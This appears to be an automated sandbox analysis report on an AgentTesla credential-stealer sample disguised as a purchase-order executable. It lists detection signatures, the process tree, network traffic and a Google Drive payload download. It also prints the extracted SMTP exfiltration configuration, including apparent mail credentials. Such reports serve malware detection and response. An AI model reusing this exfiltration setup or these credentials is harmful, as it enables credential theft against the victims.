Loading ...

Play interactive tourEdit tour

Windows Analysis Report LISTA DE PEDIDO DE COMPRA.exe

Overview

General Information

Sample Name:LISTA DE PEDIDO DE COMPRA.exe
Analysis ID:1373
MD5:943986d4cb51d4cc29946aa7914dbc5b
SHA1:cce8ec41fe0fabda407eaa5b8b9efc81168c5e5c
SHA256:47d8b37351178ed6a40a269f3f42eb23fa0780a9a93098439275f7e66897a924
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Enables security privileges
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • LISTA DE PEDIDO DE COMPRA.exe (PID: 2364 cmdline: 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe' MD5: 943986D4CB51D4CC29946AA7914DBC5B)
    • RegAsm.exe (PID: 5916 cmdline: 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 2320 cmdline: 'C:\Users\user\Desktop\LISTA DE PEDIDO DE COMPRA.exe' MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • mpam-1ba0cab.exe (PID: 4424 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe' /q WD MD5: FDAE491F6414B619270DD128A4000BAB)
    • MpSigStub.exe (PID: 7880 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1503.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-1ba0cab.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • wevtutil.exe (PID: 6272 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • wevtutil.exe (PID: 6596 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\6E33F3E4-DD3F-9BF4-EC8E-12828A11375C.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 3480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: RegAsm.exe PID: 2320JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: RegAsm.exe PID: 2320JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

          Sigma Overview

          Networking:

          barindex
          Sigma detected: RegAsm connects to smtp portShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 109.169.39.245, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 2320, Protocol: tcp, SourceIp: 192.168.11.20, SourceIsIpv6: false, SourcePort: 49778

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: conhost.exe.3480.30.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "murbano@reyesyasociados.com495QTi314mail.reyesyasociados.comnappiboioffice203@gmail.com"}
          Multi AV Scanner detection for submitted fileShow sources
          Source: LISTA DE PEDIDO DE COMPRA.exeReversingLabs: Detection: 15%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA33B8 CryptUnprotectData,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,
          Source: LISTA DE PEDIDO DE COMPRA.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49770 version: TLS 1.2
          Source: Binary string: MpSigStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
          Source: Binary string: MpAdlStub.pdbGCTL source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
          Source: Binary string: MpAdlStub.pdb source: mpam-1ba0cab.exe, 00000019.00000002.6244546959.00007FF7E3A9F000.00000002.00020000.sdmp
          Source: Binary string: MpSigStub.pdb source: mpam-1ba0cab.exe, 00000019.00000003.6149251039.0000020B4D841000.00000004.00000001.sdmp, MpSigStub.exe, 0000001A.00000002.6241664412.00007FF657987000.00000002.00020000.sdmp, MpSigStub.exe.25.dr
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795B030 FindNextFileW,FindClose,FindFirstFileW,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790F810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657982504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

          Networking:

          barindex
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: Joe Sandbox ViewASN Name: IOMART-ASGB IOMART-ASGB
          Source: global trafficTCP traffic: 192.168.11.20:49778 -> 109.169.39.245:587
          Source: global trafficTCP traffic: 192.168.11.20:49778 -> 109.169.39.245:587
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: http://DXdVhu.com
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
          Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
          Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: RegAsm.exe, 0000000A.00000002.7799376587.000000001FD56000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
          Source: RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
          Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: RegAsm.exe, 0000000A.00000002.7792807129.000000001DC2A000.00000004.00000001.sdmpString found in binary or memory: http://mail.reyesyasociados.com
          Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: RegAsm.exe, 0000000A.00000002.7779076026.0000000000DFC000.00000004.00000020.sdmpString found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/
          Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839h
          Source: RegAsm.exe, 0000000A.00000003.3217918693.0000000000E2F000.00000004.00000001.sdmpString found in binary or memory: https://doc-0c-50-docs.googleusercontent.com/om~;
          Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/
          Source: RegAsm.exe, 0000000A.00000002.7778539921.0000000000DBA000.00000004.00000020.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3
          Source: RegAsm.exe, 0000000A.00000002.7777894312.0000000000CB0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3wininet.dllMozilla/5
          Source: RegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000003.4120444145.0000000000EB1000.00000004.00000001.sdmpString found in binary or memory: https://f9WVaLZTFfU.com
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com//
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/v104
          Source: RegAsm.exe, 0000000A.00000002.7799692226.000000001FD93000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: RegAsm.exe, 0000000A.00000002.7791815811.000000001DB74000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
          Source: RegAsm.exe, 0000000A.00000002.7791395540.000000001DB21000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
          Source: unknownDNS traffic detected: queries for: drive.google.com
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/0kmp839hage8unguv37m9lhvdkbnieei/1632762825000/00519186742208262786/*/1S2e4Rmu8PYtHWrTHvb17Qs1CjaoopuG3?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-50-docs.googleusercontent.comConnection: Keep-Alive
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: RegAsm.exe, 0000000A.00000002.7792195736.000000001DBBD000.00000004.00000001.sdmpString found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
          Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49768 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 142.250.184.193:443 -> 192.168.11.20:49770 version: TLS 1.2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0074C098
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00741130
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0074BA70
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00743A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00744320
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0074C7D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00743708
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_007A0158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_007A6988
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_007A1420
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00A3C2AA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00D4D837
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00D49180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00D44EB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00D49BD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00D444F8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00D43330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C9896C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C98E318
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C982720
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C983496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C9834B1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C98340B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C98357F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C98368E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C98361B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C9833B7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C98330A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1C983363
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1D985E08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1D984ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1D985DC3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1D986AF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA5FB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA4888
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA9700
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEAA468
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA3FE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA7FF8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA5BA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEAB8A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA4877
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA0040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_1FEA0021
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578F86BC
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657903728
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65790D038
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578FFF90
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65793490C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796B88C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65791A818
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6579777FC
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795F76C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6579215F8
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657967600
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6579834D4
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657969520
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65791C52C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657982504
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657926480
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657972480
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF6578F1420
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65795E410
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65797837C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657920320
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF657919278
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65793A288
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65796C21C
          Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\1496CAC4-B309-4A8A-ACB7-494664AD3BC9\MpSigStub.exeCode function: 26_2_00007FF65791B20C
